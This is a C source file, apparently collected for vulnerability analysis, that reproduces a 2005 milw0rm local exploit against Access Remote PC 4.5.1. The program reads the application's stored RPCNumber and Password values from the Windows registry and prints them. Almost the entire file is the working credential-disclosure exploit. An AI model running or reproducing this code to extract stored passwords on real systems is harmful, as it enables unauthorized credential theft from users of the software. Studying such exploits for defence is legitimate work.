lilbool/vuln-code-analysis
0
1/*****************************************************************
2
3Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan
4
5Application: Access Remote PC 4.5.1 (and probably prior versions)
6Vendor: www.access-remote-pc.com
7
8Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
9to local users.
10
11Discovered & Coded by: Kozan
12Credits to ATmaCA
13Web : www.netmagister.com
14Web2: www.spyinstructors.com
15Mail: kozan@netmagister.com
16
17*****************************************************************/
18
19#include <windows.h>
20#include <stdio.h>
21
22#define BUF 100
23
24int main()
25{
26 HKEY hKey;
27 char RPCNumber[BUF], Password[BUF];
28 DWORD dwBuf = BUF;
29
30 if( RegOpenKeyEx( HKEY_CURRENT_USER,
31 "Software\\Access Remote PC\\Client\\Options\\Proxy",
32 0,
33 KEY_QUERY_VALUE,
34 &hKey
35 ) !=ERROR_SUCCESS )
36 {
37 fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
38 return -1;
39 }
40
41 if( RegQueryValueEx( hKey,
42 "RPCNumber",
43 NULL,
44 NULL,
45 (BYTE *)&RPCNumber,
46 &dwBuf
47 ) != ERROR_SUCCESS )
48 lstrcpy( RPCNumber,"Not Found!\n" );
49
50 if( RegQueryValueEx( hKey,
51 "Password",
52 NULL,
53 NULL,
54 (BYTE *)&Password,
55 &dwBuf
56 ) != ERROR_SUCCESS )
57 lstrcpy( Password,"Not Found!\n" );
58
59 fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
60 fprintf( stdout, "Credits to AtmaCA\n" );
61 fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
62 fprintf( stdout, "kozan@netmagister.com\n\n" );
63 fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
64 fprintf( stdout, "Password\t: %s\n", Password );
65
66 return 0;
67}
68
69// milw0rm.com [2005-07-04]